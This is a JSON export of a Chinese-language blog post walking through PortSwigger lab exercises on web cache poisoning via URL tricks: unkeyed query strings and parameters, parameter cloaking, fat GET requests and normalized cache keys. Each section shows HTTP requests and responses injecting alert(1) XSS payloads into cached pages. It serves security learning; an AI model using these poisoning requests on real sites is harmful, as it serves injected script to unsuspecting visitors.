{"id":1207,"date":"2023-02-08T00:09:00","date_gmt":"2023-02-07T16:09:00","guid":{"rendered":"https:\/\/systw.net\/note\/?p=1207"},"modified":"2024-04-14T11:28:00","modified_gmt":"2024-04-14T03:28:00","slug":"web-cache-poisioning-url","status":"publish","type":"post","link":"https:\/\/systw.net\/note\/archives\/1207","title":{"rendered":"Web Cache Poisioning URL"},"content":{"rendered":"\n<p><\/p>\n\n\n\n<p>\u7db2\u7ad9\u7684\u5927\u90e8\u5206\u8f38\u5165\u4f86\u81eaURL\u548c\u67e5\u8a62\u5b57\u4e32\uff0c\u4f46\u662f\u9019\u4e9b\u8acb\u6c42\u884c\u901a\u5e38\u662f\u5feb\u53d6\u9375\u7684\u4e00\u90e8\u5206\uff0c\u56e0\u6b64\u4e00\u822c\u4f86\u8aaa\u4e0d\u6703\u7528\u505a\u5feb\u53d6\u4e2d\u6bd2\u3002\u4f46\u6709\u4e9b\u5feb\u53d6\u7cfb\u7d71\u6703\u56e0\u70ba\u4e00\u4e9b\u539f\u56e0\u6216\u7f3a\u9677\uff0c\u5c0e\u81f4\u53ef\u4ee5\u5229\u7528\u9019\u4e9b\u5730\u65b9\u4f86\u505a\u5feb\u53d6\u4e2d\u6bd2\u3002\u5728URL\u4e0a\u7684\u5feb\u53d6\u4e2d\u6bd2\u6280\u5de7\uff0c\u5e38\u898b\u7684\u6709\u4ee5\u4e0b\u5e7e\u7a2e\uff1a<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>unkeyed query string<\/li>\n\n\n\n<li>unkeyed query parameter<\/li>\n\n\n\n<li>Cache parameter cloaking<\/li>\n\n\n\n<li>fat GET request<\/li>\n\n\n\n<li>Normalized cache keys<\/li>\n<\/ul>\n\n\n\n<div style=\"height:100px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-dots\"\/>\n\n\n\n<p><\/p>\n\n\n\n<h2 class=\"wp-block-heading\">unkeyed query string<\/h2>\n\n\n\n<p>\u67d0\u4e9b\u7db2\u7ad9\u4e0a\uff0c\u6574\u500b\u67e5\u8a62\u5b57\u4e32\u88ab\u6392\u9664\u5728\u5feb\u53d6\u9375\u4e4b\u5916\uff0c\u53ef\u4ee5\u5229\u7528\u9019\u500b\u7279\u6027\u9032\u884c\u5feb\u53d6\u6295\u6bd2\uff0c\u8209\u4f8b\u5982\u4e0b<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">\u6b63\u5e38\u884c\u70ba\u89c0\u5bdf<\/h3>\n\n\n\n<p>\u5047\u5982\u6b63\u5e38\u8acb\u6c42\u5982\u4e0b\uff0c\u8fd4\u56de\u5167\u5bb9\u53ef\u4ee5\u770b\u51fa\u76ee\u6a19\u6709cache <\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>########### normal requst ########### \nGET \/ HTTP\/1.1\n...omit...\n\n########### normal response ########### \nHTTP\/1.1 200 OK\n...omit...\nAge: 0\nX-Cache: miss\n...omit...\n&lt;link rel=\"canonical\" href='\/\/ac041f0f1ee0548280324f8300a3002d.web-security-academy.net\/'\/>\n...omit...<\/code><\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">\u6f0f\u6d1e\u6e2c\u8a66<\/h3>\n\n\n\n<p>\u7531\u65bc\u76ee\u6a19\u6709\u6f0f\u6d1e\uff0c\u5728\u8acb\u6c42\u7684query\u589e\u52a0?a=1\uff0c\u5c31\u80fd\u6210\u529f\u66f4\u65b0\u7de9\u5b58\u5167\u5bb9\u3002\u9001\u51fa\u5f8c\u7684\u56de\u61c9\u53ef\u80fd\u6703\u548c\u4e0a\u500b\u8acb\u6c42\u4e00\u6a23\uff0c\u4f46\u591a\u8a66\u5e7e\u6b21\u4e00\u76f4\u5230\u7de9\u5b58\u6642\u9593\u7d50\u675f\u5f8c\u3002<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>GET \/?a=1 HTTP\/1.1\n...omit...<\/code><\/pre>\n\n\n\n<p>\u5982\u679c\u4e0d\u60f3\u7b49\u7de9\u5b58\u6642\u9593\u7d50\u675f\u5c31\u66f4\u65b0\u7de9\u5b58\u5167\u5bb9\uff0c\u53ef\u4ee5\u7528cacheburster\uff0c\u4f8b\u5982\u52a0\u4e0aOrigin: test\uff0c\u5982\u4e0b<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>GET \/?a=1 HTTP\/1.1\nOrigin: test\n...omit...<\/code><\/pre>\n\n\n\n<p>\u6210\u529f\u66f4\u65b0\u7de9\u5b58\u5f8c\uff0c\u8fd4\u56de\u5167\u5bb9\u591a\u4e86<code>?a=1<\/code>\uff0c\u5982\u4e0b<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>HTTP\/1.1 200 OK\n...omit...\nAge: 0\nX-Cache: miss\n...omit...\n&lt;link rel=\"canonical\" href='\/\/ac041f0f1ee0548280324f8300a3002d.web-security-academy.net\/?a=1'\/>\n...omit...<\/code><\/pre>\n\n\n\n<p>\u73fe\u5728\u53ea\u8981\u5728\u7de9\u5b58\u6642\u9593\u5167\u8acb\u6c42<code>\/<\/code>\uff0c\u8fd4\u56de\u5167\u5bb9\u90fd\u662f\u525b\u525b\u7de9\u5b58\u7684<code>\/?a=1<\/code>\uff0c\u5982\u4e0b<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>########### normal request ########### \nGET \/ HTTP\/1.1\n...omit...\n\n########### normal response ########### \nHTTP\/1.1 200 OK\n...omit...\nAge: 1\nX-Cache: hit\n...omit...\n&lt;link rel=\"canonical\" href='\/\/ac041f0f1ee0548280324f8300a3002d.web-security-academy.net\/?a=1'\/>\n...omit...<\/code><\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">\u653b\u64ca\u8acb\u6c42<\/h3>\n\n\n\n<p>\u6240\u4ee5\u53ea\u8981\u5728\u8acb\u6c42\u7684url query\u589e\u52a0\u653b\u64ca\u8a9e\u6cd5\u66f4\u65b0\u7de9\u5b58\u5167\u5bb9\uff0c\u8fd4\u56de\u5167\u5bb9\u5305\u542b\u653b\u64ca\u5167\u5bb9\u5982\u4e0b<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>########### attack request ########### \nGET \/?evil='\/>&lt;script>alert(1)&lt;\/script> HTTP\/1.1\nOrigin: test\n...omit...\n\n########### attack response ########### \nHTTP\/1.1 200 OK\n...omit...\nAge: 0\nX-Cache: miss\n...omit...\n&lt;link rel=\"canonical\" href='\/\/ac041f0f1ee0548280324f8300a3002d.web-security-academy.net\/?evil='\/>&lt;script>alert(1)&lt;\/script>'\/>\n...omit...<\/code><\/pre>\n\n\n\n<p>\u73fe\u5728\u53ea\u8981\u5728\u7de9\u5b58\u6642\u9593\u5167\u8acb\u6c42<code>\/<\/code>\uff0c\u8fd4\u56de\u5167\u5bb9\u4f9d\u820a\u5305\u542b\u4e4b\u524d\u7684\u653b\u64caurl query<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>########### attack requst  test ###########  \nGET \/ HTTP\/1.1\nOrigin: test\n...omit...\n\n########### attack response test ########### \nHTTP\/1.1 200 OK\n...omit...\nAge: 2\nX-Cache: hit\n...omit...\n&lt;link rel=\"canonical\" href='\/\/ac041f0f1ee0548280324f8300a3002d.web-security-academy.net\/?evil='\/>&lt;script>alert(1)&lt;\/script>'\/>\n...omit...<\/code><\/pre>\n\n\n\n<p>Lab: Web cache poisoning via an unkeyed query string<\/p>\n\n\n\n<p><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-dots\"\/>\n\n\n\n<p><\/p>\n\n\n\n<h2 class=\"wp-block-heading\">unkeyed query parameter<\/h2>\n\n\n\n<p>\u6709\u4e9b\u7db2\u7ad9\u50c5\u6392\u9664\u8207\u5f8c\u7aef\u61c9\u7528\u7a0b\u5f0f\u7121\u95dc\u7684\u7279\u5b9a\u67e5\u8a62\u53c3\u6578\uff0c\u4f8b\u5982\u7528\u65bc\u5206\u6790\u6216\u6295\u653e\u5b9a\u5411\u5ee3\u544a\u7684\u53c3\u6578<\/p>\n\n\n\n<p>\u4f8b\u5982\uff0c\u4ee5\u4e0b\u7db2\u7ad9\u7684\u53c3\u6578utm_content\u53ef\u7528\u505a\u5feb\u53d6\u6295\u6bd2\u653b\u64ca<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>########### attack request ########### \r\nGET \/?utm_content='\/>&lt;script>alert(1)&lt;\/script>\r\n...omit...\n\r\n########### attack response ###########\r\n...omit...\nX-Cache: hit\n\r...omit...\n&lt;link rel=\"canonical\" href='\/\/ac6c1fcf1f88b0a8808b268c00bf0032.web-security-academy.net\/?utm_content='\/>&lt;script>alert(1)&lt;\/script>'\/>\r\n...omit...<\/code><\/pre>\n\n\n\n<p>lab: Web cache poisoning via an unkeyed query parameter<\/p>\n\n\n\n<p><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-dots\"\/>\n\n\n\n<p><\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Cache parameter cloaking<\/h2>\n\n\n\n<p>\u5feb\u53d6\u548c\u61c9\u7528\u7a0b\u5f0f\u4e4b\u9593\u7684\u4efb\u4f55\u89e3\u6790\u5dee\u7570\uff0c\u53ef\u5141\u8a31\u5c07\u4efb\u610f\u53c3\u6578\u96b1\u85cf\uff0c\u4e26\u7528\u5728\u61c9\u7528\u7a0b\u5f0f\u908f\u8f2f\u4e2d\u3002<\/p>\n\n\n\n<p>\u5047\u8a2dcachekey\u70ba<code>keyed_param<\/code>\uff0c\u8acb\u6c42\u5982\u4e0b<\/p>\n\n\n\n<p><code>GET \/?keyed_param=abc&amp;excluded_param=123;keyed_param=bad-stuff-here<\/code><\/p>\n\n\n\n<p>\u8a31\u591a\u5feb\u53d6\u6703\u628a\u9019\u500b\u8acb\u6c42\u770b\u505a2\u500b\u53c3\u6578<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><code>keyed_param=abc<\/code><\/li>\n\n\n\n<li><code>excluded_param=123;keyed_param=bad-stuff-here<\/code><\/li>\n<\/ul>\n\n\n\n<p>\u4f46\u5728\u5f8c\u7aefRuby on Rails \u6703\u770b\u5230<code>;<\/code>\u4e26\u5c07\u67e5\u8a62\u5b57\u4e32\u62c6\u5206\u70ba\u4e09\u500b\u55ae\u7368\u7684\u53c3\u6578<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><code>keyed_param=abc<\/code><\/li>\n\n\n\n<li><code>excluded_param=123<\/code><\/li>\n\n\n\n<li><code>keyed_param=bad-stuff-here<\/code><\/li>\n<\/ul>\n\n\n\n<p>\u5728Ruby on Rails\u7684\u904b\u7b97\u4e2d\uff0c\u91cd\u8986\u53c3\u6578\u6703\u53d6\u7b2c2\u500b\uff0c\u56e0\u6b64<code>keyed_param=bad-stuff-here<\/code>\u6392\u9664\u5728cachekey\u5916\uff0c\u53ef\u4ee5\u5229\u7528\u9019\u500b\u5730\u65b9\u5feb\u53d6\u6295\u6bd2\u3002<\/p>\n\n\n\n<p><\/p>\n\n\n\n<p>\u4ee5\u53e6\u4e00\u500b\u6f0f\u6d1e\u7db2\u7ad9\u70ba\u4f8b\uff0c\u4ee5\u4e0b\u70ba\u6b63\u5e38\u8acb\u6c42<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>########### normal request ###########\r\nGET \/js\/geolocate.js?callback=setCountryCookie HTTP\/1.1\r\n...omit...\r\n\n########### normal response ###########\r\nHTTP\/1.1 200 OK\r\nContent-Type: application\/javascript; charset=utf-8\r\nKeep-Alive: timeout=0\r\nCache-Control: max-age=35\r\nAge: 32\r\nX-Cache: hit\r\nConnection: close\r\nContent-Length: 201\r\nconst setCountryCookie = (country) => { document.cookie = 'country=' + country; };\r\nconst setLangCookie = (lang) => { document.cookie = 'lang=' + lang; };\r\nsetCountryCookie({\"country\":\"United Kingdom\"});<\/code><\/pre>\n\n\n\n<p>\u5206\u6790\u89c0\u5bdf\u5f8c\u767c\u73fe\uff0ccallback\u53c3\u6578\u53ef\u4ee5\u7528\u4f86\u63a7\u5236\u51fd\u6578\uff0c\u4f46\u8a72\u53c3\u6578\u70bacachekey\uff0c\u6240\u4ee5\u7121\u6cd5\u5feb\u53d6\u6295\u6bd2\u3002\u4f46\u5728\u66f4\u9032\u4e00\u6b65\u7814\u7a76\u6703\u767c\u73fe3\u500b\u7279\u5225\u7684\u5730\u65b9\uff1a<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u589e\u52a0\u91cd\u8907\u7684<code>callback<\/code>\u53c3\u6578\uff0c\u53ea\u6709\u6700\u5f8c\u4e00\u500b\u53c3\u6578\u6703\u53cd\u6620\u5728\u56de\u61c9\u4e2d <\/li>\n\n\n\n<li>\u652f\u63f4<code>utm_content<\/code>\u53c3\u6578\uff0c\u5c6c\u65bcuncachekey<\/li>\n\n\n\n<li>\u4f7f\u7528\u00a0<code>;<\/code> \u5c07\u53e6\u4e00\u500b\u53c3\u6578\u9644\u52a0\u5230<code>utm_content<\/code>\uff0c\u5247\u5feb\u53d6\u6703\u5c07\u5176\u8996\u70ba\u55ae\u4e00\u53c3\u6578\uff0c\u800c\u4e14\u540c\u5c6c\u65bcuncachekey<\/li>\n<\/ul>\n\n\n\n<p>\u5408\u4f75\u90193\u9ede\uff0c\u53ef\u4ee5\u4f7f\u7528<code>;<\/code>\u5c07\u7b2c\u4e8c\u500b<code>callback<\/code>\u53c3\u6578\u9644\u52a0\u5230<code>utm_content<\/code>\u53c3\u6578\u4e2d\uff0c\u5b83\u4e0d\u5c6c\u65bccachekey\uff0c\u4e26\u4e14\u4ecd\u7136\u6703\u8986\u5beb\u56de\u61c9\u4e2d\u7684\u51fd\u6578\uff0c\u5982\u4e0b<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>######## request ########\nGET \/js\/geolocate.js?callback=setCountryCookie&amp;utm_content=foo;callback=arbitraryFunction\r\n\r\n######## response ########\nHTTP\/1.1 200 OK\r\nX-Cache-Key: \/js\/geolocate.js?callback=setCountryCookie\r\n\u2026\r\narbitraryFunction({\"country\" : \"United Kingdom\"})<\/code><\/pre>\n\n\n\n<p>\u6839\u64da\u9019\u4e9b\u7279\u6027\uff0c\u53ea\u8981\u5728\u6700\u5f8ccallback\u53c3\u6578\u52a0\u5165\u653b\u64ca\u8a9e\u6cd5\uff0c\u5c31\u53ef\u4ee5\u88fd\u505a\u5feb\u53d6\u6295\u6bd2\u653b\u64ca\uff0c\u5982\u4e0b<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>######## attack request ######## \r\nGET \/js\/geolocate.js?callback=setCountryCookie&amp;utm_content=foo;callback=alert(1) HTTP\/1.1\r\n...omit...\n\r\n######## attack response ######## \r\nHTTP\/1.1 200 OK\r\nContent-Type: application\/javascript; charset=utf-8\r\nConnection: close\r\nCache-Control: max-age=35\r\nAge: 0\r\nX-Cache: miss\r\nContent-Length: 193\r\n\r\nconst setCountryCookie = (country) => { document.cookie = 'country=' + country; };\r\nconst setLangCookie = (lang) => { document.cookie = 'lang=' + lang; };\r\nalert(1)({\"country\":\"United Kingdom\"});<\/code><\/pre>\n\n\n\n<p>\u73fe\u5728\u53ea\u8981\u5728\u7de9\u5b58\u6642\u9593\u4e2d\uff0c\u8acb\u6c42<code>GET \/js\/geolocate.js?callback=setCountryCookie<\/code>\u90fd\u6703\u5f97\u5230\u5feb\u53d6\u4e2d\u6bd2\u7684\u8fd4\u56de\u5167\u5bb9<\/p>\n\n\n\n<p>Lab: Parameter cloaking<\/p>\n\n\n\n<p><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-dots\"\/>\n\n\n\n<p><\/p>\n\n\n\n<h2 class=\"wp-block-heading\">fat GET request<\/h2>\n\n\n\n<p>\u5982\u679cHTTP\u65b9\u6cd5\u6c92\u6709\u88ab\u505a\u70bacachekey\uff0c\u53ef\u80fd\u5141\u8a31\u4f7f\u7528\u9019\u500b\u65b9\u6cd5\uff0c\u5728\u8acb\u6c42\u5167\u5bb9\u4e2d\u52a0\u5165\u7b2c2\u500b\u540c\u540d\u53c3\u6578\uff0c\u8209\u4f8b\u5982\u4e0b<\/p>\n\n\n\n<p>\u5047\u8a2d\u6b63\u5e38\u8acb\u6c42\u5982\u4e0b<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>######## normal request  ########\nGET \/js\/geolocate.js?callback=setCountryCookie HTTP\/1.1\n...omit...\n\n######## normal response ########\nHTTP\/1.1 200 OK\nContent-Type: application\/javascript; charset=utf-8\nKeep-Alive: timeout=0\nCache-Control: max-age=35\nAge: 3\nX-Cache: hit\nConnection: close\nContent-Length: 201\n\nconst setCountryCookie = (country) => { document.cookie = 'country=' + country; };\nconst setLangCookie = (lang) => { document.cookie = 'lang=' + lang; };\nsetCountryCookie({\"country\":\"United Kingdom\"});<\/code><\/pre>\n\n\n\n<p>\u56e0\u70ba\u7db2\u7ad9\u6709\u6f0f\u6d1e\uff0c\u6240\u4ee5\u8acb\u6c42\u5167\u5bb9\u4e2d\u653e\u5165\u7b2c2\u500bcallback\uff0c\u8fd4\u56de\u5167\u5bb9\u6703\u986f\u793a\u7b2c2\u500b\u7684\u7d50\u679c\uff0c\u5982\u4e0b<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>######## attack request ######## \r\nGET \/js\/geolocate.js?callback=setCountryCookie HTTP\/1.1\r\n...omit...\r\n<mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-red-color\">callback=alert(1)<\/mark>\n\r\n######## attack response ######## \r\nHTTP\/1.1 200 OK\r\nContent-Type: application\/javascript; charset=utf-8\r\nConnection: close\r\nCache-Control: max-age=35\r\nAge: 0\r\nX-Cache: miss\r\nContent-Length: 197\r\n\r\nconst setCountryCookie = (country) => { document.cookie = 'country=' + country; };\r\nconst setLangCookie = (lang) => { document.cookie = 'lang=' + lang; };\r\n<mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-red-color\">alert(1)<\/mark><strong>\r\n\r<\/strong>\n({\"country\":\"United Kingdom\"});<\/code><\/pre>\n\n\n\n<p>\u4e00\u65e6cache\u4e2d\u6bd2\u5f8c\uff0c\u5728\u5feb\u53d6\u6642\u9593\u5167\uff0c\u53ea\u8981\u7528\u6b63\u5e38\u65b9\u5f0f\u8acb\u6c42\uff0c\u90fd\u6703\u62ff\u5230\u4e2d\u6bd2\u7de9\u5b58\uff0c\u5982\u4e0b<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>######## normal request  ########\r\nGET \/js\/geolocate.js?callback=setCountryCookie HTTP\/1.1\r\n...omit...\n\r\n######## poison response ######## \r\nHTTP\/1.1 200 OK\r\nContent-Type: application\/javascript; charset=utf-8\r\nConnection: close\r\nCache-Control: max-age=35\r\nAge: 2\r\nX-Cache: hit\r\nContent-Length: 197\r\n\r\nconst setCountryCookie = (country) => { document.cookie = 'country=' + country; };\r\nconst setLangCookie = (lang) => { document.cookie = 'lang=' + lang; };\r\n<mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-red-color\">alert(1)<\/mark>\r\n\r\n({\"country\":\"United Kingdom\"});<\/code><\/pre>\n\n\n\n<p>Lab: Web cache poisoning via a fat GET request<\/p>\n\n\n\n<p><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-dots\"\/>\n\n\n\n<p><\/p>\n\n\n\n<p><\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Normalized cache keys<\/h2>\n\n\n\n<p>\u5982\u679cURL\u7121\u6cd5\u57f7\u884c\u653b\u64ca\u4ee3\u78bc\uff0c\u53ef\u8b93\u5feb\u53d6\u57f7\u884c\u653b\u64ca\u4ee3\u78bc<\/p>\n\n\n\n<p>\u8209\u4f8b\u5982\u4e0b\uff0c\u96a8\u4fbf\u67e5\u8a62\u4e00\u500b\u4e0d\u5b58\u5728\u7684\u7db2\u5740\uff0c\u6b63\u5e38\u60c5\u6cc1\u4e0b\u6703\u8fd4\u56de\u627e\u4e0d\u5230<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>######## request ######## \r\nGET \/random HTTP\/1.1\r\nHost: ac191f8c1f64ab9780f91953005800bb.web-security-academy.net\r\n...omit...\n\r\n######## response ######## \r\nHTTP\/1.1 404 Not Found\r\nContent-Type: text\/html; charset=utf-8\r\nConnection: close\r\nCache-Control: max-age=10\r\nAge: 0\r\nX-Cache:miss\r\nX-XSS-Protection: 0\r\nContent-Length: 50\r\n\r\n&lt;p>Not Found: \/random&lt;\/p><\/code><\/pre>\n\n\n\n<p>\u5047\u5982\u76ee\u6a19\u525b\u597d\u6709\u6f0f\u6d1e\uff0c\u53ef\u4ee5\u5c0d\u76ee\u6a19\u505a\u5feb\u53d6\u4e2d\u6bd2\uff0c\u628axss\u653e\u9032\u5feb\u53d6\u4e2d<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>######## attack request ######## \r\nGET \/random&lt;\/p>&lt;script>alert(1)&lt;\/script>&lt;p>foo HTTP\/1.1\r\nHost: ac191f8c1f64ab9780f91953005800bb.web-security-academy.net\r\n...omit...\r\n######## attack response ######## \r\nHTTP\/1.1 404 Not Found\r\nContent-Type: text\/html; charset=utf-8\r\nConnection: close\r\nCache-Control: max-age=10\r\nAge: 0\r\nX-Cache:miss\r\nX-XSS-Protection: 0\r\nContent-Length: 60\r\n\r\n&lt;p>Not Found: \/random&lt;\/p>&lt;script>alert(1)&lt;\/script>&lt;p>foo&lt;\/p><\/code><\/pre>\n\n\n\n<p>\u4e0a\u8ff0\u7684\u653b\u64caURL\uff0c<code>\/random&lt;\/p>&lt;script>alert(1)&lt;\/script>&lt;p>foo<\/code>\u56e0\u70ba\u88aburlencode\u7de8\u78bc\uff0c\u56e0\u6b64\u8a72\u653b\u64ca\u4ee3\u78bc\u4e0d\u6703\u57f7\u884c\u3002\u4f46\u662f\u7de9\u5b58\u986f\u793a\u6642\u6703\u5c07\u9019\u6bb5\u505aurlencode\u89e3\u78bc\uff0c\u56e0\u6b64\u53ef\u5229\u7528\u7de9\u5b58\u57f7\u884c\u8a72\u653b\u64ca\u4ee3\u78bc\u3002<\/p>\n\n\n\n<p>\u53ea\u8981\u5c07\u8a72\u7db2\u5740\u63d0\u7d66\u53d7\u5bb3\u8005\uff0c\u5c0d\u65b9\u9ede\u64ca\u5f8c\u4fbf\u6703\u770b\u5230\u7de9\u5b58\u5167\u5bb9\uff0c\u7136\u5f8c\u986f\u793a\u653b\u64ca\u4ee3\u78bc<\/p>\n\n\n\n<p>Lab: URL normalization<\/p>\n","protected":false},"excerpt":{"rendered":"<p>\u7db2\u7ad9\u7684\u5927\u90e8\u5206\u8f38\u5165\u4f86\u81eaURL\u548c\u67e5\u8a62\u5b57\u4e32\uff0c\u4f46\u662f\u9019\u4e9b\u8acb\u6c42\u884c\u901a\u5e38\u662f\u5feb &#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"fifu_image_url":"","fifu_image_alt":"","_jetpack_memberships_contains_paid_content":false,"footnotes":"","jetpack_publicize_message":"","jetpack_publicize_feature_enabled":true,"jetpack_social_post_already_shared":false,"jetpack_social_options":{"image_generator_settings":{"template":"highway","default_image_id":0,"font":"","enabled":false},"version":2}},"categories":[368],"tags":[],"class_list":["post-1207","post","type-post","status-publish","format-standard","hentry","category-operations"],"jetpack_publicize_connections":[],"jetpack_featured_media_url":"","jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/posts\/1207","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/comments?post=1207"}],"version-history":[{"count":0,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/posts\/1207\/revisions"}],"wp:attachment":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/media?parent=1207"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/categories?post=1207"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/tags?post=1207"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}